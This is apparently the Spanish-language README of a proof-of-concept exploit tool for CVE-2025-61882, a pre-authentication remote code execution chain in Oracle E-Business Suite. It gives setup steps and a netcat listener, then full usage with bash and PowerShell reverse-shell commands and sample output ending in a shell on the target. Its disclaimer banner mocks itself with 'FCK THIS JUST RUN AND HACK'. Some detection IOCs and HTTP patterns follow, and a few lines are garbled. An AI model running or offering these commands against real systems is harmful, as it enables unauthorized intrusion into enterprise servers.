Exploit para CVE-2025-61882, una RCE crítica de pre-autenticación en Oracle E-Business Suite. Combina SSRF, inyección CRLF, HTTP smuggling e inyección XSLT para la ejecución remota de código sin autenticación.
Consulta nuestra publicación en el blog para obtener detalles técnicos
ESTA HERRAMIENTA ES SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨 ║
║ ║
║ By using this tool, you acknowledge and agree that: ║
║ ║
║ ║
║ FCK THIS JUST RUN AND HACK ║
║ ║
║ ║
║ ║
║ ║
║ ║
╚══════════════════════════════════════════════════════════════╝
Herramienta de pruebas de seguridad para CVE-2025-61882, una vulnerabilidad crítica de ejecución remota de código sin autenticación previa que afecta a Oracle E-Business Suite.
Creado por: Mindflare
CVE-2025-61882 es una sofisticada cadena de exploits que combina cinco vulnerabilidades distintas:
/OA_HTML/configurator/UiServletreturn_url/OA_HTML/help/../# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# Install dependencies
pip3 install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
En una terminal separada, inicia un listener de netcat:
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
Uso básico (objetivo Linux):
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
Objetivo Windows:
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
| Parámetro | Descripción | Obligatorio | Ejemplo |
|---|---|---|---|
--target | URL de Oracle EBS objetivo | Sí | http://192.168.1.22:8000 |
--lhost | Tu dirección IP (para callbacks) | Sí | 192.168.1.10 |
--lport | Puerto del servidor HTTP (sirve el payload XSL) | Sí | 80 o 8080 |
--command | Comando a ejecutar en el objetivo | Sí | Ver ejemplos anteriores |
--platform | Sistema operativo del objetivo: linux o windows | Sí | linux |
[*] Target URL: http://192.168.1.22:8000
[*] Listener IP: 192.168.1.10
[*] Listener Port: 80
[*] Platform: linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
IOCs de red:
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
Patrones HTTP:
POST /OA_HTML/configurator/UiServletPOST /OA_HTML/SyncServletGET /OA_HTML/help/../*.jspLicencia MIT con restricciones de uso educativo: consulta LICENSE
AVISO LEGAL: Este software es exclusivamente para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el uso indebido.
**Created by:** Mindflare | **Last Updated:** October 2025